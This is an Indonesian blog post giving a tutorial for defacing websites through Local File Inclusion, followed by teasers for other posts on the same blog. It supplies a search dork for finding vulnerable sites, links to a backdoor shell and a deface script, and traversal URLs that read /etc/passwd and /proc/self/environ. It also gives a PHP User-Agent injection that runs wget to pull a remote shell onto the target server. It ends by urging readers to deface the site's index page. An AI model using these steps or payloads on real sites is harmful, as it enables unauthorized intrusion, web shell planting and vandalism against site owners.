Langsung ke konten utama

Tutorial deface menggunakan poc LFI

 



Hallo :)

Pada peluang kali ini saya bakal coba mengimplementasikan bagaimana caranya mengexploitasi terhadap website tujuan yang rentan terhadap serangan LFI atau mampu disebut termasuk bersama Local File Inclusion.


Oke tak usah berlalu-lama, kami langsung saja ya...


Hal yang pertama adalah mencari tujuan yang vulnerable terhadap serangan LFI. Kalian mampu memanfatkan search engine layaknya google, bing, atau yang lainya bersama dork, perumpamaan dorknya "index.php?file= site:com" selebihnya kembangin sendiri biar meraih yang terlalu vuln.


Tapi di sini saya sudah memiliki tujuan yang siap untuk dieksekusi, tapi saya tidak bakal saya sebutkan nama websitenya,  perumpamaan tujuan saya layaknya ini...


Jika kalian belum punya Shell backdoor dan script deface kalian bisa download dulu melalui link dibawah ini :


Shell backdoor : Klik Me 

Script deface : Klik Me


 

https://contoh.com/?file=college.php


Target sudah ada, kemudian coba ubah "college.php" bersama "../../../" perumpamaan lengkapnya bakal layaknya ini..

https://contoh.com/?file=../../../

Setelah saya klik enter, tapi di sini saya tidak meraih pesan error dengan sebutan lain hanya blank warna putih gitu. Entah ini vuln atau tidak saya termasuk agak begitu kurang paham.


Ok gamasalah, coba iseng-iseng menganti "../../../" bersama layaknya ini "/etc/passwd" perumpamaan layaknya ini...

https://contoh.com/?file=/etc/passwd

Tapi lagi-lagi di sini tidak meraih apa-apa, penampilan hanya menampkan blank warna putih, shit!



 

Mikir sebentar, kemudian di sini saya coba menaikan directorynya. Contoh layaknya ini..

https://contoh.com/?file=../etc/passwd > blank

https://contoh.com/?file=../../etc/passwd > lagi-lagi hanya blank

Tapi kemudian terhadap pas saya menaikan directorynya pas ke tiga, sepetti ini...

https://contoh.com/?file=../../../etc/passwd

Boom, saya berhasil membaca file etc/passwd wah mantap ini mah hhh...




Selanjutnya saya bakal coba mengecheck /proc/self/environ apakah mampu diakses atau tidak? Sekarang ubah "/etc/passwd" bersama "/proc/self/environ" selanjutnya jalankan..

https://contoh.com/?file=../../../proc/self/environ

Mantul mantap betul ternyata berhasil membaca filenya, layaknya ini...




Yeah, /proc/self/environ berhasil diakses. Tapi terkecuali kalian terhadap pas mau mengakses /proc/self/environ menampilkan halaman kosong (blank) atau tidak mampu diakses, atau barangkali itu beroperating system *BSD.


Sekarang seterusnya mari kami injeksi bersama malicious code bersama meracuni  terhadap bagian http headernya. Kalian mampu mengunakan addon tamper information mozilla firefox.

Caranya membuka tamper information di mozilla firefox kemudian selanjutnya masukan url /proc/self/environ yang tadi "https://contoh.com/?file=../../../proc/self/environ" selanjutnya terhadap bagian user-agent isikian code layaknya tersebut ini...


<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>


lalu klik submit.


Ok injeksi malicious code selesai, bila berhasil letak shellnya berada terhadap directory berikut...


https://contoh.com/shell.php 



Setelah Shell berhasil di akses terserah kalian mau diapain, saran mending deface saja jangan aneh-aneh kasian yang punya website:v kalau mau tebas index backup dulu ya, atau ganti saja file index.php saja.

Label:

Komentar

Posting Komentar

Berkomentar dengan baik dan dilarang mencantumkan link aktif, jika ada komentar dengan link aktif akan admin nonaktifkan.

Postingan populer dari blog ini

Update! Kumpulan akun PES 2021 mobile gratis terbaru

  Halo sobat tamatekno, di artikel ini ada yang spesial nih. Ya di artikel ini saya ingin berbagi beberapa akun PES 2021 mobil gratis kepada sobat tamatekno, karena kebetulan akun saya banyak yang tersimpan di email. Ada 20an lebih akun yang akan saya bagikan kepada sobat semua, daripada ngga dimainkan karena saya mau fokus kuliah dan ngeblog. Akun PES yang ingin saya bagikan bukan akun kaleng-kaleng yang sob, karena akun-akun saya merupakan akun old dan terdapat banyak ICONIC dan legend. Selain itu akun PES gratis yang ingin saya bagikan juga memiliki aset yang melimpah, khususnya GP dan trainer. Untuk koin undah saya pake buat roll ICONIC kemaren, wkwk. Nah buat sobat yang ingin mendapatkan akun PES gratis, sobat bisa mengambilnya dari beberapa akun di bawah ini. Akun-akunya sudah saya buatkan Konami ID semua yah, jadi ngga ada yang menggunakan Gmail atau google play. Dan sobat harus cepat mengamankan akunya jika sobat dapet, biar ngga di amankan oleh orang lain. Yang terakhir ...
8 komentar
Baca selengkapnya

Kumpulan script deface keren terbaru

 Download Kumpulan Script Deface Keren Terbaru-Deface merupakan teknik mengganti atau menyisipkan file pada server, teknik ini mampu ditunaikan dikarenakan terdapat lubang atau celah keamanan pada proses security (vulnerability) yang tersedia pada sebuah website. Hal ini mempunyai tujuan untuk lakukan pergantian tamilan pada sebuah webiste korban atau target bersama penampilan yang dimiliki si defacer, penampilan yang dimiliki oleh defacer ini disebut bersama makna script deface. Sedangkan orang atau kelompok yang lakukan kegiatan deface disebut defacer. Biasanya para defacer bakal men-deface sebuah web site dan meninggalkan jejak berupa nickname di dalam script deface yang mereka punya bersama target supaya dilihat/diketahui defacer lain dan untuk menandai bahwa yang sudah men-deface web site selanjutnya adalah defacer yang sudah mencantumkan nick name pada sebuah web site yang di deface-nya. Lalu bagaimana memicu sebuah script deface untuk pengaruhi penampilan sebuah website? Unt...
Posting Komentar
Baca selengkapnya

Cara mengembalikan akun PES 2021 Mobile yang hilang

  Bagi anda yang sedang membaca artikel ini pasti anda pernah atau sedang mengalami hilangnya akun PES milik anda saat anda menghapus, menginstal ulang, atau clear data aplikasi PES Mobile. Memang ketiga hal diatas adalah 3 penyebab utama hilangnya akun PES, karena jika anda melakukan 3 hal diatas akun PES Mobile anda akan tertimpa akun baru. Nah cara untuk mengatasinya adalah dengan menyimpan akun anda melalui google play atau Konami ID. Terus bagaimana caranya? Untuk melakukan transfer data akun PES ? Simak artikelnya sampai habis, karena akan saya jelaskan semuanya. Cara mengembalikan akun PES Mobile yang hilang Ada 3 cara yang bisa anda gunakan untuk mengembalikan akun PES Mobile yang hilang. Maka jika cara pertama gagal anda bisa menggunakan cara yang kedua atau cara yang ketiga. Berikut adalah 3 cara untuk mengembalikan akun PES Mobile yang tertimpa. 1. Menggunakan transfer data akun google Cara yang bisa pertama kali anda lakukan saat anda kehilangan akun PES Mobile ada...
3 komentar
Baca selengkapnya